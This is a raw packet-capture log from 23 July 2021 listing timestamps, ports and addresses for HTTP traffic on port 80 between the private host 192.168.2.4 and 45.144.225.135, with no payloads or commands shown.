Jul 23, 2021 22:24:24.757487059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757508993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757531881 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757559061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757585049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757608891 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757632017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757653952 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757679939 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757703066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757725000 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757752895 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757776976 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757798910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757822037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757846117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757869959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757894039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757916927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757942915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757966995 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.757991076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758012056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758014917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758028984 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758033037 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758035898 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758038998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758039951 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758043051 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758044958 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758048058 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758050919 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758053064 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758054972 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758058071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758060932 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758064032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758064985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758069038 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758071899 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758074999 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758078098 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758081913 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758085966 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758088112 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758090019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758091927 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758095026 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758097887 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758100986 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758104086 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758105993 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758107901 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758111000 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758112907 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758114100 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758116961 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758120060 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758122921 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758125067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758127928 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758130074 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758132935 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758136034 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758138895 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758141041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758141041 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758143902 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758147955 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758150101 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758152962 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758156061 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758157969 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758166075 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758188009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758192062 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758212090 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758224010 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758235931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758268118 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758284092 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758291960 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758315086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758339882 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758351088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758358002 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758372068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758395910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758395910 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758415937 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758423090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758435011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758455038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758472919 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758485079 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758502960 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758526087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758544922 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758563042 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758582115 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758605957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758630037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758652925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758677959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758701086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758728981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758754015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758775949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758795977 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758799076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758820057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.758824110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758846998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758869886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758893967 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758919954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758945942 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758970976 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.758996010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759007931 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759020090 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759043932 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759068012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759093046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759094000 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759108067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759135008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759162903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759175062 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759187937 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759190083 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759192944 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759212017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759213924 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759234905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759258032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759263039 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759280920 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759290934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759305954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759329081 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759331942 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759356022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759367943 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759380102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759404898 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759406090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759428978 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759447098 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759453058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759475946 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759500027 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759522915 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759525061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759527922 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759560108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759562016 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759587049 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759588003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759613991 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759613991 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759639025 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759661913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759686947 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759689093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759713888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759737015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759737968 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759742022 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759744883 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759747028 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759763956 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759782076 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759787083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759809971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759831905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759841919 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759855032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759867907 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759877920 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759898901 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759901047 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759923935 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759932995 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759951115 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.759967089 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.759978056 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760000944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760004997 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760023117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760042906 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760044098 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760061979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760085106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760087967 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760107040 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760111094 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760133028 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760154009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760155916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760174036 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760194063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760205030 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760216951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760234118 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760236025 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760257006 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760260105 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760277033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760301113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760310888 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760325909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760349989 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760356903 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760369062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760391951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760411978 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760420084 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760427952 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760433912 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760441065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760457039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760473013 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760473013 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760488987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760504007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760513067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760519028 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760539055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760545969 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760557890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.760576010 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760684013 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.760808945 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.769679070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.769715071 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.769756079 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.769777060 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.769777060 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.769840956 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.770643950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.770682096 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.770708084 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.770757914 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.770893097 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.770947933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.771003008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.771054029 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.771056890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.771075964 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.771100998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.771101952 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.771152973 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.771155119 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.771159887 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.771172047 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.771207094 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.771210909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.771231890 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.771241903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.771266937 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.771291018 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.771303892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.771317005 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.771353006 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.782438040 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.782471895 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.782520056 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.782522917 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.782542944 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.782552004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.782573938 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.782592058 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.782608032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.782633066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.782643080 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.782655954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.782665014 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.782677889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.782685041 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.782710075 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.792803049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.792839050 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.792861938 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.792886019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.792902946 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.792924881 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.792946100 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.792956114 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.792972088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.792985916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.792994022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.792994976 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793018103 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793040037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793060064 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793064117 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793071032 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793081999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793103933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793112993 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793128014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793147087 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793153048 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793184042 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793185949 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793206930 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793210983 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793231964 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793256044 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793262005 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793281078 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793303967 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793303967 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793327093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793349981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793371916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793374062 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793391943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793415070 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793415070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793420076 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793440104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793464899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793467999 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793486118 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793494940 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793508053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793533087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793543100 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793555021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793557882 CEST	49750	80	192.168.2.4	45.144.225.135
